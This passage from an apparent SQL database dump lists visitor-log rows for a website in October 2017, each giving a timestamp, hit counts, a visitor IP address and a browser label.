465,1507373524,1,1,0,0,'37.53.111.44','chrome'),(164466,1507373746,1,1,0,0,'217.69.133.9','other'),(164467,1507373753,1,1,0,0,'217.69.133.2','other'),(164468,1507374234,1,1,0,0,'8.29.198.27','other'),(164469,1507374310,2,2,0,0,'178.154.171.88','other'),(164470,1507374502,1,1,0,0,'37.53.111.44','chrome'),(164471,1507374988,1,1,0,0,'217.69.133.5','other'),(164472,1507375214,5,5,0,0,'5.189.138.42','other'),(164473,1507377080,2,0,2,0,'66.249.64.30',''),(164474,1507378081,1,1,0,0,'91.209.11.236','other'),(164475,1507378210,2,0,2,0,'66.249.64.30',''),(164476,1507378460,1,0,1,0,'66.249.70.25',''),(164477,1507378546,1,1,0,0,'66.249.64.30','chrome'),(164478,1507378554,2,0,2,0,'66.249.64.29',''),(164479,1507378667,1,1,0,0,'81.1.242.33','other'),(164480,1507379042,1,0,1,0,'66.249.64.28',''),(164481,1507379708,1,1,0,0,'37.53.111.44','chrome'),(164482,1507380560,2,2,0,0,'95.132.59.39','firefox'),(164483,1507380804,1,1,0,0,'91.209.11.236','other'),(164484,1507381484,1,1,0,0,'93.74.212.147','firefox'),(164485,1507381591,1,1,0,0,'217.69.133.4','other'),(164486,1507382405,1,1,0,0,'207.46.13.47','other'),(164487,1507382912,1,1,0,0,'141.8.142.74','other'),(164488,1507384427,1,1,0,0,'178.154.171.88','other'),(164489,1507384547,1,1,0,0,'193.201.224.32','firefox'),(164490,1507384941,1,1,0,0,'217.69.133.5','other'),(164491,1507385021,1,1,0,0,'91.209.11.236','other'),(164492,1507385063,1,1,0,0,'8.29.198.26','other'),(164493,1507385894,1,1,0,0,'207.46.13.47','other'),(164494,1507385975,1,0,1,0,'66.249.70.27',''),(164495,1507386238,1,1,0,0,'178.154.171.88','other'),(164496,1507387012,1,1,0,0,'31.184.197.6','chrome'),(164497,1507387120,1,1,0,0,'141.8.142.74','other'),(164498,1507388546,1,0,1,0,'66.249.64.29',''),(164499,1507389185,1,1,0,0,'91.209.11.236','other'),(164500,1507389475,1,1,0,0,'216.244.66.237','other'),(164501,1507390645,1,1,0,0,'108.59.8.80','other'),(164502,1507390719,1,1,0,0,'141.8.142.74','other'),(164503,1507391580,1,1,0,0,'178.154.171.88','other'),(164504,1507392661,1,1,0,0,'87.250.224.46','other'),(164505,1507393147,1,1,0,0,'178.154.171.88','other'),(164506,1507393631,1,1,0,0,'188.32.176.159','msie'),(164507,1507394549,1,1,0,0,'37.9.113.182','other'),(164508,1507395002,1,1,0,0,'141.8.142.74','other'),(164509,1507395890,1,1,0,0,'8.29.198.25','other'),(164510,1507399111,1,1,0,0,'95.132.33.106','firefox'),(164511,1507400386,1,1,0,0,'34.240.253.47','other'),(164512,1507403099,1,1,0,0,'178.154.171.88','other'),(164513,1507403836,1,1,0,0,'217.69.133.203','other'),(164514,1507404190,1,1,0,0,'31.184.197.6','chrome'),(164515,1507404607,1,1,0,0,'95.132.33.106','firefox'),(164516,1507405343,1,1,0,0,'87.250.224.46','other'),(164517,1507406724,1,1,0,0,'8.29.198.26','other'),(164518,1507407992,1,1,0,0,'178.154.171.88','other'),(164519,1507408014,67,67,0,0,'34.240.253.47','other'),(164520,1507408900,1,1,0,0,'178.154.171.88','other'),(164521,1507409209,1,1,0,0,'216.244.66.237','other'),(164522,1507411002,1,1,0,0,'180.76.15.26','other'),(164523,1507411177,1,0,1,0,'66.249.64.29',''),(164524,1507411383,2,2,0,0,'141.8.142.74','other'),(164525,1507411832,1,0,1,0,'66.249.70.27',''),(164526,1507412852,1,1,0,0,'91.209.11.236','other'),(164527,1507414319,1,0,1,0,'66.249.70.25',''),(164528,1507415455,1,1,0,0,'91.209.11.236','other'),(164529,1507416189,1,0,1,0,'66.249.64.28',''),(164530,1507416444,1,1,0,0,'78.161.149.221','other'),(164531,1507417557,1,1,0,0,'8.29.198.26','other'),(164532,1507418060,1,1,0,0,'139.227.144.203','msie'),(164533,1507418354,1,1,0,0,'46.161.9.55','chrome'),(164534,1507418454,1,1,0,0,'217.69.133.203','other'),(164535,1507418634,2,2,0,0,'178.154.171.88','other'),(164536,1507419615,2,2,0,0,'91.209.11.236','other'),(164537,1507420065,1,0,1,0,'66.249.64.29',''),(164538,1507421348,1,1,0,0,'87.250.224.46','other'),(164539,1507421670,1,1,0,0,'31.184.197.6','firefox'),(164540,1507423252,1,1,0,0,'91.209.11.236','other'),(164541,1507425023,1,1,0,0,'207.46.13.131','other'),(164542,1507425130,82,82,0,0,'23.237.4.26','other'),(164543,1507425141,1,1,0,0,'217.69.133.9','other'),(164544,1507425630,1,0,1,0,'66.249.64.30',''),(164545,1507426887,1,1,0,0,'91.209.11.236','other'),(164546,1507428431,1,1,0,0,'8.29.198.25','other'),(164547,1507428607,2,2,0,0,'91.209.11.236','other'),(164548,1507429573,1,1,0,0,'216.244.66.237','other'),(164549,1507429676,1,0,1,0,'68.180.229.52',''),(164550,1507430094,1,1,0,0,'141.8.142.74','other'),(164551,1507430512,1,1,0,0,'180.76.15.151','other'),(164552,1507430531,1,0,1,0,'66.249.64.28',''),(164553,1507432091,1,1,0,0,'66.249.64.29','chrome'),(164554,1507432110,1,0,1,0,'66.249.70.29',''),(164555,1507432118,1,1,0,0,'66.249.70.27','chrome'),(164556,1507432120,1,1,0,0,'178.154.171.88','other'),(164557,1507432629,1,1,0,0,'141.8.142.74','other'),(164558,1507433342,1,1,0,0,'213.184.122.102','chrome'),(164559,1507434568,1,1,0,0,'178.154.171.88','other'),(164560,1507436650,1,0,1,0,'66.249.66.155',''),(164561,1507436996,1,1,0,0,'66.249.93.89','chrome'),(164562,1507437552,1,1,0,0,'178.154.171.88','other'),(164563,1507438103,1,1,0,0,'141.8.142.74','other'),(164564,1507439274,1,1,0,0,'8.29.198.27','other'),(164565,1507442478,1,1,0,0,'176.113.170.104','chrome'),(164566,1507443654,1,1,0,0,'141.8.142.74','other'),(164567,1507445678,6,6,0,0,'87.250.224.46','other'),(164568,1507445839,1,0,1,0,'66.249.66.156',''),(164569,1507446278,32,32,0,0,'141.8.142.74','other'),(164570,1507446293,15,15,0,0,'178.154.171.88','other'),(164571,1507446331,1,1,0,0,'37.9.113.115','other'),(164572,1507446335,1,1,0,0,'37.9.113.110','other'),(164573,1507446338,1,1,0,0,'178.154.171.4','other'),(164574,1507446354,2,2,0,0,'37.9.113.182','other'),(164575,1507446384,1,1,0,0,'141.8.132.19','other'),(164576,1507448545,1,1,0,0,'217.69.133.9','other'),(164577,1507449731,1,1,0,0,'5.9.98.178','other'),(164578,1507449733,1,1,0,0,'141.8.142.74','other'),(164579,1507450130,1,1,0,0,'8.29.198.26','other'),(164580,1507450135,1,1,0,0,'178.154.171.88','other'),(164581,1507450632,1,1,0,0,'5.9.98.178','other'),(164582,1507451535,1,1,0,0,'5.9.98.178','other'),(164583,1507451539,1,1,0,0,'176.113.170.104','chrome'),(164584,1507451865,1,1,0,0,'178.154.171.88','other'),(164585,1507452106,1,1,0,0,'217.69.133.3','other'),(164586,1507452341,1,1,0,0,'66.249.66.157','chrome'),(164587,1507452436,1,1,0,0,'5.9.98.178','other'),(164588,1507453338,1,1,0,0,'5.9.98.178','other'),(164589,1507453417,12,12,0,0,'5.9.89.170','other'),(164590,1507455254,1,1,0,0,'209.90.225.218','chrome'),(164591,1507456563,1,1,0,0,'207.46.13.143','other'),(164592,1507456659,1,1,0,0,'157.55.39.130','other'),(164593,1507457269,1,0,1,0,'66.249.66.155',''),(164594,1507457657,1,0,1,0,'66.249.66.76',''),(164595,1507457666,1,1,0,0,'66.249.66.74','chrome'),(164596,1507457693,1,1,0,0,'66.249.66.155','chrome'),(164597,1507457795,1,0,1,0,'66.249.66.156',''),(164598,1507459472,1,1,0,0,'91.209.11.236','other'),(164599,1507460323,1,1,0,0,'207.46.13.11','other'),(164600,1507460976,1,1,0,0,'8.29.198.26','other'),(164601,1507461105,1,1,0,0,'91.209.11.236','other'),(164602,1507461801,2,2,0,0,'54.165.59.7','other'),(164603,1507462532,1,1,0,0,'141.8.142.29','other'),(164604,1507463428,1,1,0,0,'87.250.224.46','other'),(164605,1507464519,1,1,0,0,'178.154.171.88','other'),(164606,1507464985,1,0,1,0,'66.249.66.155',''),(164607,1507465453,1,1,0,0,'207.46.13.47','other'),(164608,1507467779,1,1,0,0,'91.209.11.236','other'),(164609,1507468172,1,1,0,0,'141.8.142.74','other'),(164610,1507471408,1,1,0,0,'207.46.13.47','other'),(164611,1507471815,1,1,0,0,'8.29.198.25','other'),(164612,1507473476,1,1,0,0,'207.46.13.11','other'),(164613,1507473596,1,0,1,0,'66.249.66.76',''),(164614,1507473605,1,1,0,0,'66.249.66.76','chrome'),(164615,1507473624,1,1,0,0,'66.249.66.155','chrome'),(164616,1507474934,1,1,0,0,'216.244.66.237','other'),(164617,1507475199,1,1,0,0,'141.8.142.74','other'),(164618,1507475220,2,2,0,0,'51.255.173.13','other'),(164619,1507475332,1,1,0,0,'95.133.193.218','chrome'),(164620,1507475911,1,1,0,0,'162.210.196.130','other'),(164621,1507476198,2,2,0,0,'142.4.200.37','other'),(164622,1507476669,1,0,1,0,'66.249.66.201',''),(164623,1507477087,2,2,0,0,'141.8.142.74','other'),(164624,1507477260,1,1,0,0,'91.196.178.67','chrome'),(164625,1507477993,1,1,0,0,'207.46.13.143','other'),(164626,1507478146,1,0,1,0,'66.249.66.201',''),(164627,1507479329,1,1,0,0,'163.172.255.19','chrome'),(164628,1507481532,1,1,0,0,'92.113.191.101','chrome'),(164629,1507482081,1,1,0,0,'217.69.133.5','other'),(164630,1507482094,1,1,0,0,'217.69.133.2','other'),(164631,1507482657,1,1,0,0,'8.29.198.26','other'),(164632,1507483928,1,1,0,0,'91.209.11.236','other'),(164633,1507484300,1,0,1,0,'66.249.66.157',''),(164634,1507485802,1,1,0,0,'37.73.202.54','chrome'),(164635,1507486312,1,1,0,0,'91.196.178.163','chrome'),(164636,1507486711,1,1,0,0,'91.209.11.236','other'),(164637,1507487056,1,1,0,0,'91.196.178.134','chrome'),(164638,1507487465,1,1,0,0,'91.196.178.65','chrome'),(164639,1507488565,1,1,0,0,'91.196.178.66','other'),(164640,1507488658,1,1,0,0,'141.8.142.74','other'),(164641,1507489040,1,1,0,0,'213.180.203.40','other'),(164642,1507491325,1,1,0,0,'217.69.133.6','other'),(164643,1507491588,1,1,0,0,'37.112.37.6','firefox'),(164644,1507492093,1,0,1,0,'66.249.66.201',''),(164645,1507492245,1,1,0,0,'217.69.133.194','other'),(164646,1507492447,1,1,0,0,'91.209.11.236','other'),(164647,1507492669,1,1,0,0,'66.249.66.156','chrome'),(164648,1507493500,1,1,0,0,'8.29.198.26','other'),(164649,1507493536,1,1,0,0,'180.76.15.145','other'),(164650,1507493852,4,4,0,0,'204.12.226.26','other'),(164651,1507494205,1,0,1,0,'66.249.66.158',''),(164652,1507496442,1,1,0,0,'66.249.66.157','chrome'),(164653,1507497151,1,1,0,0,'178.93.44.197','chrome'),(164654,1507497809,1,1,0,0,'163.172.255.19','chrome'),(164655,1507498397,1,1,0,0,'217.69.133.217','other'),(164656,1507498591,1,1,0,0,'167.114.248.251','firefox'),(164657,1507500060,1,1,0,0,'66.249.66.195','chrome'),(164658,1507501973,1,1,0,0,'180.76.15.25','other'),(164659,1507502096,1,1,0,0,'66.249.66.195','chrome'),(164660,1507502733,1,1,0,0,'87.250.224.96','other'),(164661,1507502785,1,1,0,0,'40.77.167.50','other'),(164662,1507502953,1,0,1,0,'66.249.66.157',''),(164663,1507504336,1,1,0,0,'8.29.198.26','other'),(164664,1507504573,1,0,1,0,'66.249.66.156',''),(164665,1507504818,1,1,0,0,'207.46.13.47','other'),(164666,1507506763,1,0,1,0,'66.249.66.158',''),(164667,1507507517,1,0,1,0,'66.249.66.199',''),(164668,1507507981,1,1,0,0,'207.46.13.143','other'),(164669,1507508808,1,0,1,0,'66.249.66.157',''),(164670,1507508816,1,0,1,0,'66.249.66.195',''),(164671,1507508817,1,1,0,0,'66.249.66.201','chrome'),(164672,1507509654,1,1,0,0,'157.55.39.93','other'),(164673,1507513005,1,1,0,0,'37.9.113.110','other'),(164674,1507513663,1,0,1,0,'66.249.66.156',''),(164675,1507513792,1,1,0,0,'217.69.133.4','other'),(164676,1507514084,1,1,0,0,'5.45.207.58','other'),(164677,1507515179,1,1,0,0,'8.29.198.26','other'),(164678,1507515242,1,0,1,0,'66.249.66.158',''),(164679,1507517802,1,0,1,0,'66.249.66.158',''),(164680,1507517871,1,1,0,0,'66.249.66.199','chrome'),(164681,1507518009,1,1,0,0,'216.244.66.237','other'),(164682,1507518123,1,1,0,0,'207.46.13.158','other'),(164683,1507518294,1,1,0,0,'52.210.53.75','other'),(164684,1507518865,1,1,0,0,'66.249.66.199','chrome'),(164685,1507518880,2,2,0,0,'66.249.66.157','chrome'),(164686,1507519008,1,1,0,0,'51.255.66.102','other'),(164687,1507521018,1,1,0,0,'37.9.113.138','other'),(164688,1507522674,1,1,0,0,'37.9.113.110','other'),(164689,1507522714,1,1,0,0,'95.108.213.24','other'),(164691,1507524629,1,1,0,0,'87.250.224.125','other'),(164692,1507524736,1,1,0,0,'66.249.66.201','chrome'),(164693,1507526011,1,1,0,0,'8.29.198.25','other'),(164694,1507526147,1,1,0,0,'66.249.66.199','chrome'),(164695,1507526183,1,1,0,0,'178.154.171.60','other'),(164696,1507526911,1,1,0,0,'217.69.133.9','other'),(164697,1507527675,1,0,1,0,'66.249.66.199',''),(164698,1507527845,1,1,0,0,'91.196.178.161','chrome'),(164699,1507528797,1,1,0,0,'91.196.178.168','chrome'),(164700,1507529717,67,67,0,0,'52.210.53.75','other'),(164701,1507530096,1,1,0,0,'91.196.178.69','chrome'),(164702,1507530873,1,1,0,0,'178.95.243.222','chrome'),(164703,1507531058,2,2,0,0,'91.196.178.72','chrome'),(164704,1507531247,1,0,1,0,'66.249.66.158',''),(164705,1507531510,1,1,0,0,'217.69.133.9','other'),(164706,1507531794,1,0,1,0,'66.249.66.199',''),(164707,1507532738,2,2,0,0,'216.244.66.237','other'),(164708,1507533333,1,1,0,0,'91.196.178.67','chrome'),(164709,1507533338,1,1,0,0,'95.132.42.164','firefox'),(164710,1507533451,1,1,0,0,'207.46.13.97','other'),(164711,1507536289,1,1,0,0,'40.77.167.67','other'),(164712,1507536316,1,1,0,0,'91.196.178.66','chrome'),(164713,1507536335,1,1,0,0,'178.94.13.253','opera'),(164714,1507536561,2,2,0,0,'95.213.141.126','opera'),(164715,1507536853,1,1,0,0,'8.29.198.25','other'),(164716,1507537248,1,1,0,0,'66.249.66.158','chrome'),(164717,1507538041,1,1,0,0,'87.250.224.125','other'),(164718,1507538162,1,1,0,0,'91.196.178.133','firefox'),(164719,1507539092,1,1,0,0,'85.115.62.180','chrome'),(164720,1507539163,1,1,0,0,'91.196.179.138','chrome'),(164721,1507539292,1,1,0,0,'178.154.200.32','other'),(164722,1507539911,2,2,0,0,'91.196.178.67','chrome'),(164723,1507540644,1,1,0,0,'193.34.92.39','chrome'),(164724,1507541636,1,1,0,0,'178.93.11.254','chrome'),(164725,1507541852,1,1,0,0,'91.196.178.70','chrome'),(164726,1507542066,1,1,0,0,'217.69.133.2','other'),(164727,1507542753,1,1,0,0,'217.69.133.6','other'),(164728,1507543061,1,1,0,0,'91.196.178.162','chrome'),(164729,1507543391,1,1,0,0,'91.196.178.71','chrome'),(164730,1507544288,1,1,0,0,'37.139.186.228','firefox'),(164731,1507544453,1,1,0,0,'5.45.207.49','other'),(164732,1507544673,1,1,0,0,'66.249.66.201','chrome'),(164733,1507545747,1,1,0,0,'91.209.11.236','other'),(164734,1507546486,1,1,0,0,'91.196.178.134','other'),(164735,1507547465,1,1,0,0,'217.69.133.6','other'),(164736,1507547540,1,1,0,0,'199.58.86.209','other'),(164737,1507547697,1,1,0,0,'8.29.198.26','other'),(164738,1507547990,1,1,0,0,'66.249.66.157','chrome'),(164739,1507549426,1,1,0,0,'195.10.210.70','chrome'),(164740,1507549563,1,1,0,0,'80.252.154.233','chrome'),(164741,1507550796,1,1,0,0,'5.45.207.30','other'),(164742,1507552039,1,1,0,0,'91.196.178.166','chrome'),(164743,1507552067,1,1,0,0,'91.196.178.72','chrome'),(164744,1507552241,1,1,0,0,'213.180.203.40','other'),(164745,1507552835,1,1,0,0,'94.179.20.146','chrome'),(164746,1507553091,1,1,0,0,'217.69.133.2','other'),(164747,1507553429,1,1,0,0,'95.132.114.160','firefox'),(164748,1507553732,1,1,0,0,'141.8.142.74','other'),(164749,1507554309,1,1,0,0,'217.69.133.3','other'),(164750,1507554350,1,1,0,0,'46.219.235.95','chrome'),(164751,1507554700,1,1,0,0,'91.209.11.236','other'),(164752,1507554967,1,1,0,0,'91.196.178.72','chrome'),(164753,1507556116,1,1,0,0,'91.196.178.70','chrome'),(164754,1507557012,1,0,1,0,'66.249.66.156',''),(164755,1507557577,1,1,0,0,'91.196.178.70','firefox'),(164756,1507557589,5,5,0,0,'198.199.126.235','other'),(164757,1507558372,1,1,0,0,'91.196.178.72','chrome'),(164758,1507558508,1,1,0,0,'95.132.114.160','firefox'),(164759,1507558542,1,1,0,0,'8.29.198.25','other'),(164760,1507558875,1,1,0,0,'188.32.234.53','msie'),(164761,1507558947,1,1,0,0,'139.59.135.82','other'),(164762,1507559360,1,1,0,0,'91.196.178.71','chrome'),(164763,1507559674,1,1,0,0,'91.196.178.68','firefox'),(164764,1507559786,1,1,0,0,'178.94.194.33','chrome'),(164765,1507559847,1,1,0,0,'66.102.9.27','chrome'),(164766,1507560394,1,1,0,0,'37.73.255.239','chrome'),(164767,1507561447,1,0,1,0,'66.249.66.157',''),(164768,1507561619,1,1,0,0,'81.1.242.33','other'),(164769,1507561637,2,2,0,0,'185.137.18.122','chrome'),(164770,1507562338,1,1,0,0,'46.161.9.55','chrome'),(164771,1507562760,1,1,0,0,'178.154.171.88','other'),(164773,1507562939,2,2,0,0,'81.1.242.33','other'),(164774,1507563403,1,1,0,0,'91.196.178.163','chrome'),(164775,1507564456,1,1,0,0,'91.196.178.163','chrome'),(164776,1507564767,1,1,0,0,'46.246.31.36','other'),(164777,1507564821,1,0,1,0,'66.249.66.199',''),(164778,1507564868,1,1,0,0,'207.46.13.97','other'),(164779,1507565251,1,1,0,0,'178.154.171.10','other'),(164780,1507566151,1,1,0,0,'217.69.133.3','other'),(164781,1507566237,1,1,0,0,'91.196.177.152','chrome'),(164782,1507567561,1,1,0,0,'207.46.13.97','other'),(164783,1507569040,1,0,1,0,'66.249.66.199',''),(164784,1507569112,1,1,0,0,'66.249.66.195','chrome'),(164785,1507569139,1,1,0,0,'54.165.59.7','other'),(164786,1507569383,1,1,0,0,'8.29.198.27','other'),(164787,1507569559,1,1,0,0,'91.196.178.36','chrome'),(164788,1507569893,1,1,0,0,'217.69.133.5','other'),(164789,1507571727,1,1,0,0,'217.69.133.2','other'),(164790,1507571732,1,1,0,0,'217.69.133.3','other'),(164791,1507571735,1,1,0,0,'217.69.133.9','other'),(164792,1507571763,1,0,1,0,'66.249.66.199',''),(164793,1507572027,2,0,2,0,'66.249.66.195',''),(164794,1507573534,1,0,1,0,'66.249.66.195',''),(164795,1507574083,1,1,0,0,'213.191.4.128','msie'),(164796,1507574190,1,0,1,0,'66.249.66.158',''),(164797,1507574380,1,1,0,0,'91.196.178.102','chrome'),(164798,1507574655,1,0,1,0,'66.249.66.201',''),(164799,1507575383,3,3,0,0,'85.102.148.140','other'),(164800,1507575494,1,1,0,0,'217.69.133.4','other'),(164801,1507575750,1,1,0,0,'109.63.225.147','chrome'),(164802,1507576155,1,0,1,0,'66.249.66.157',''),(164803,1507576720,1,1,0,0,'40.77.167.84','other'),(164804,1507576996,1,1,0,0,'37.9.113.101','other'),(164805,1507577066,1,1,0,0,'40.77.167.74','other'),(164806,1507577085,1,1,0,0,'178.154.200.32','other'),(164807,1507577289,1,1,0,0,'217.69.133.6','other'),(164808,1507578203,1,1,0,0,'157.55.39.195','other'),(164809,1507578205,1,1,0,0,'188.163.16.6','chrome'),(164810,1507578609,1,1,0,0,'66.249.66.158','chrome'),(164811,1507578842,1,1,0,0,'40.77.167.84','other'),(164812,1507579313,1,1,0,0,'180.76.15.143','other'),(164813,1507579431,1,0,1,0,'66.249.66.195',''),(164814,1507580216,1,1,0,0,'8.29.198.25','other'),(164815,1507580768,1,1,0,0,'88.198.67.69','other'),(164816,1507580829,1,1,0,0,'193.107.73.124','chrome'),(164817,1507581092,1,1,0,0,'217.69.133.2','other'),(164818,1507582060,1,1,0,0,'217.69.133.4','other'),(164819,1507582063,1,1,0,0,'217.69.133.3','other'),(164820,1507582945,1,1,0,0,'217.69.133.194','other'),(164821,1507583452,1,1,0,0,'216.244.66.237','other'),(164822,1507583940,2,2,0,0,'5.189.138.42','other'),(164823,1507584500,1,1,0,0,'40.77.167.84','other'),(164824,1507586722,1,1,0,0,'217.69.133.2','other'),(164825,1507587089,1,1,0,0,'91.209.11.236','other'),(164826,1507587193,1,0,1,0,'66.249.64.29',''),(164827,1507587736,4,4,0,0,'178.154.171.55','other'),(164828,1507587740,4,4,0,0,'5.45.207.82','other'),(164829,1507587744,2,2,0,0,'37.9.113.134','other'),(164830,1507587748,4,4,0,0,'37.9.113.132','other'),(164831,1507587753,2,2,0,0,'5.45.207.49','other'),(164832,1507587757,3,3,0,0,'141.8.142.74','other'),(164833,1507587772,3,3,0,0,'213.180.203.8','other'),(164834,1507587775,2,2,0,0,'37.9.113.110','other'),(164835,1507587779,5,5,0,0,'178.154.171.4','other'),(164836,1507587783,3,3,0,0,'37.9.113.157','other'),(164837,1507587786,3,3,0,0,'5.45.207.58','other'),(164838,1507587800,1,1,0,0,'178.154.171.10','other'),(164839,1507587810,3,3,0,0,'87.250.224.46','other'),(164840,1507587813,3,3,0,0,'141.8.132.19','other'),(164841,1507587816,1,1,0,0,'37.9.113.115','other'),(164842,1507587823,4,4,0,0,'37.9.113.101','other'),(164843,1507587829,2,2,0,0,'37.9.113.100','other'),(164844,1507587832,4,4,0,0,'178.154.171.88','other'),(164845,1507587836,1,1,0,0,'37.9.113.114','other'),(164846,1507587841,1,1,0,0,'213.180.203.7','other'),(164847,1507587845,1,1,0,0,'178.154.200.7','other'),(164848,1507587854,2,2,0,0,'141.8.132.22','other'),(164849,1507587860,2,2,0,0,'37.9.113.138','other'),(164850,1507587863,2,2,0,0,'178.154.200.32','other'),(164851,1507587946,1,1,0,0,'87.250.224.90','other'),(164852,1507587958,2,2,0,0,'178.154.171.60','other'),(164853,1507587973,2,2,0,0,'213.180.203.40','other'),(164854,1507587989,1,1,0,0,'37.9.113.182','other'),(164855,1507588015,1,1,0,0,'178.154.171.81','other'),(164856,1507588572,1,1,0,0,'217.69.133.4','other'),(164857,1507588894,1,1,0,0,'178.154.171.55','other'),(164858,1507591045,1,1,0,0,'8.29.198.27','other'),(164859,1507593450,1,1,0,0,'217.69.133.4','other'),(164860,1507594171,1,1,0,0,'217.69.133.203','other'),(164861,1507594680,1,1,0,0,'40.77.167.37','other'),(164862,1507597524,1,0,1,0,'66.249.64.28',''),(164863,1507598238,1,1,0,0,'180.76.15.33','other'),(164864,1507598693,1,1,0,0,'178.154.171.55','other'),(164865,1507599000,2,2,0,0,'37.9.113.100','other'),(164866,1507599092,1,1,0,0,'40.77.167.84','other'),(164867,1507599785,1,1,0,0,'217.69.133.2','other'),(164868,1507601103,1,1,0,0,'37.9.113.110','other'),(164869,1507601877,1,1,0,0,'8.29.198.27','other'),(164870,1507602165,1,1,0,0,'213.184.122.102','chrome'),(164871,1507602200,1,1,0,0,'40.77.167.74','other'),(164872,1507603666,1,1,0,0,'66.102.9.29','chrome'),(164873,1507603927,1,1,0,0,'87.250.224.85','other'),(164874,1507604112,1,1,0,0,'213.180.203.40','other'),(164875,1507604232,1,1,0,0,'40.77.167.74','other'),(164876,1507604376,1,1,0,0,'178.154.171.81','other'),(164877,1507604854,1,1,0,0,'178.154.171.88','other'),(164878,1507605120,1,1,0,0,'5.45.207.58','other'),(164879,1507605454,1,0,1,0,'66.249.70.25',''),(164880,1507605501,2,2,0,0,'178.154.200.7','other'),(164881,1507605814,1,1,0,0,'178.154.200.32','other'),(164882,1507605818,1,1,0,0,'178.154.171.10','other'),(164883,1507605935,1,1,0,0,'37.9.113.110','other'),(164884,1507606126,1,1,0,0,'213.180.203.8','other'),(164885,1507606309,1,1,0,0,'141.8.132.22','other'),(164886,1507606821,2,2,0,0,'37.9.113.182','other'),(164887,1507606966,2,2,0,0,'54.165.59.7','other'),(164888,1507607026,1,1,0,0,'178.154.171.81','other'),(164889,1507607153,1,1,0,0,'37.9.113.101','other'),(164890,1507607250,1,1,0,0,'5.45.207.82','other'),(164891,1507607641,1,1,0,0,'216.244.66.237','other'),(164892,1507607939,1,1,0,0,'40.77.167.84','other'),(164893,1507608425,2,2,0,0,'141.8.142.74','other'),(164894,1507608681,4,4,0,0,'178.154.171.88','other'),(164895,1507609021,4,4,0,0,'87.250.224.46','other'),(164896,1507609240,1,1,0,0,'37.9.113.182','other'),(164897,1507609934,2,2,0,0,'141.8.142.74','other'),(164898,1507610530,1,1,0,0,'217.69.133.4','other'),(164899,1507610943,1,1,0,0,'217.69.133.2','other'),(164900,1507610996,1,1,0,0,'89.98.140.88','other'),(164901,1507611610,1,1,0,0,'141.8.142.74','other'),(164902,1507612058,1,1,0,0,'82.207.27.3','firefox'),(164903,1507612190,2,2,0,0,'91.196.178.70','firefox'),(164904,1507612594,1,0,1,0,'66.249.64.29',''),(164905,1507612724,1,1,0,0,'8.29.198.27','other'),(164906,1507613223,1,1,0,0,'178.154.171.60','other'),(164907,1507614131,2,2,0,0,'216.244.66.237','other'),(164908,1507614414,1,1,0,0,'91.196.178.70','chrome'),(164909,1507615851,1,1,0,0,'37.9.113.182','other'),(164910,1507616541,1,1,0,0,'217.69.133.203','other'),(164911,1507616880,2,2,0,0,'54.165.59.7','other'),(164912,1507616957,2,2,0,0,'141.8.142.74','other'),(164913,1507618408,2,2,0,0,'37.52.120.220','firefox'),(164914,1507619506,1,1,0,0,'40.77.167.84','other'),(164915,1507619785,1,0,1,0,'66.249.70.29',''),(164916,1507619824,1,1,0,0,'91.196.178.72','chrome'),(164917,1507619941,1,1,0,0,'178.154.171.88','other'),(164918,1507620222,1,1,0,0,'217.69.133.6','other'),(164919,1507620917,1,1,0,0,'66.249.64.29','chrome'),(164920,1507620955,1,1,0,0,'176.103.214.16','chrome'),(164921,1507621049,1,1,0,0,'46.161.9.55','chrome'),(164922,1507621478,1,1,0,0,'180.76.15.25','other'),(164923,1507621868,1,1,0,0,'66.249.70.27','chrome'),(164924,1507621910,1,1,0,0,'178.255.215.94','other'),(164925,1507623300,1,1,0,0,'91.196.178.132','firefox'),(164926,1507623560,1,1,0,0,'8.29.198.27','other'),(164927,1507623768,1,1,0,0,'199.58.86.209','other'),(164928,1507624281,1,1,0,0,'91.196.178.72','chrome'),(164929,1507624665,1,1,0,0,'94.178.147.174','chrome'),(164930,1507624855,1,1,0,0,'87.250.224.46','other'),(164931,1507625274,1,1,0,0,'91.196.178.70','chrome'),(164932,1507625783,1,1,0,0,'217.69.133.4','other'),(164933,1507626181,1,1,0,0,'178.154.171.88','other'),(164934,1507626316,1,1,0,0,'130.180.217.138','chrome'),(164935,1507627269,1,1,0,0,'217.69.133.203','other'),(164936,1507628165,1,1,0,0,'37.55.57.116','chrome'),(164937,1507628306,1,1,0,0,'178.154.171.88','other'),(164938,1507628435,3,3,0,0,'87.250.224.46','other'),(164939,1507629447,1,1,0,0,'91.196.177.46','firefox'),(164940,1507630381,1,1,0,0,'91.196.178.35','other'),(164941,1507631224,2,2,0,0,'54.165.59.7','other'),(164942,1507631304,1,1,0,0,'87.250.224.46','other'),(164943,1507631452,2,2,0,0,'141.8.142.74','other'),(164944,1507632559,1,1,0,0,'91.196.178.35','chrome'),(164945,1507633337,1,1,0,0,'217.69.133.203','other'),(164946,1507633842,1,1,0,0,'91.196.178.70','chrome'),(164947,1507634311,2,2,0,0,'216.244.66.237','other'),(164948,1507634396,1,1,0,0,'8.29.198.27','other'),(164949,1507634619,1,1,0,0,'180.76.15.12','other'),(164950,1507634833,1,0,1,0,'66.249.64.28',''),(164951,1507635941,1,1,0,0,'91.196.178.70','chrome'),(164952,1507636618,1,1,0,0,'81.1.242.33','other'),(164953,1507636942,1,1,0,0,'217.69.133.6','other'),(164954,1507637004,2,2,0,0,'91.196.178.70','chrome'),(164955,1507637130,1,1,0,0,'217.77.209.134','chrome'),(164956,1507637204,1,1,0,0,'91.196.178.130','chrome'),(164957,1507637391,1,1,0,0,'141.8.142.74','other'),(164958,1507637574,1,1,0,0,'91.196.177.15','chrome'),(164959,1507637677,2,2,0,0,'217.69.133.3','other'),(164960,1507637989,1,1,0,0,'91.196.178.72','chrome'),(164961,1507638678,1,1,0,0,'66.249.64.29','chrome'),(164962,1507639117,1,1,0,0,'157.55.39.236','other'),(164963,1507640455,1,1,0,0,'207.46.13.150','other'),(164964,1507640749,1,1,0,0,'141.8.142.74','other'),(164965,1507640775,1,1,0,0,'91.196.177.46','firefox'),(164966,1507640983,1,1,0,0,'46.223.113.216','firefox'),(164967,1507641016,1,1,0,0,'107.178.194.30','msie'),(164968,1507641023,1,1,0,0,'204.13.201.137','msie'),(164969,1507641324,1,1,0,0,'178.62.99.175','msie'),(164970,1507641384,1,1,0,0,'91.196.178.66','chrome'),(164971,1507641911,2,0,2,0,'66.249.70.29',''),(164972,1507643176,1,1,0,0,'91.196.178.72','chrome'),(164973,1507644241,1,1,0,0,'91.196.178.72','chrome'),(164974,1507645234,1,1,0,0,'173.234.234.202','other'),(164975,1507645237,1,1,0,0,'8.29.198.27','other'),(164976,1507645310,1,1,0,0,'155.94.219.191','other'),(1649